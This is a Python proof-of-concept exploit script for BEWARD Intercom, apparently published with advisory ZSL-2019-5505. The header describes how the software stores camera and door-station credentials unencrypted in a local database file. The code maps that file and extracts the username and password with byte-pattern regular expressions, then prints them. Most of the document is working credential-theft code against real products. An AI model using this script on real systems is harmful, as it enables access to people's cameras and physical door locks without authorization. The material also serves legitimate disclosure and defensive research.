#!/usr/bin/env python
# -*- coding: utf8 -*-
# BEWARD Intercom 2.3.1 Credentials Disclosure
# Vendor: Beward R&D Co., Ltd
# Product web page: https://www.beward.net
# Affected version:
#                   2.3.0
#                   2.2.11
#                   2.2.9
# Note: For versions above 2.2.11: The application data directory, which
# stores logs, settings and the call records archive, was moved to ProgramData\BEWARD.
# New versions: C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
# Old versions: C:\Users\%username%\AppData\Local\Beward R&D Co., Ltd\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
# Summary: Multiaccessible User Operation, Electronic Lock Control, Real-Time
# Video, Two-Way Audio. The software is used for BEWARD IP video door stations
# control.
# Desc: The application stores logs and sensitive information in an unencrypted
# binary file called BEWARD.INTERCOM.FDB. A local attacker that has access to
# the current user session can successfully disclose plain-text credentials that
# can be used to bypass authentication to the affected IP camera and door station
# and bypass access control in place.
# Tested on: Microsoft Windows 10 Home (EN)
#            Microsoft Windows 7 SP1 (EN)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
# Advisory ID: ZSL-2019-5505
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5505.php
# Output:
# --------
# C:\> python beward_creds.py
# Username: admin
# Password: S3cr3tP4$$w0rd
# C:\> 
# 28.11.2018

import subprocess
import mmap######
import re########
import os########

# For versions bellow 2.2.11:
# cuser = subprocess.check_output("echo %username%", shell=True)
# dbfile = ('C:\Users\\' + cuser.rstrip() + '\Ap'
#           'pData\Local\Beward R&D Co., Ltd\BEW'
#           'ARD Intercom\DB\BEWARD.INTERCOM.FDB'
#          )

# For versions 2.2.11 and above:

dbfile = 'C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB'

def mapfile(filename):
    file = open(filename, "r+")
    size = os.path.getsize(filename)
    return mmap.mmap(file.fileno(), size)

data = mapfile(dbfile)
m = re.search(r"\xF7\x00\x07\x05\x00(.*?)\xD3\x00\x0E\x0C\x00", data)
print "Username: " + m.group(1)
m = re.search(r"\xD3\x00\x0E\x0C\x00(.*?)\xDA\x00\x11\x0F\x00", data)
print "Password: " + m.group(1)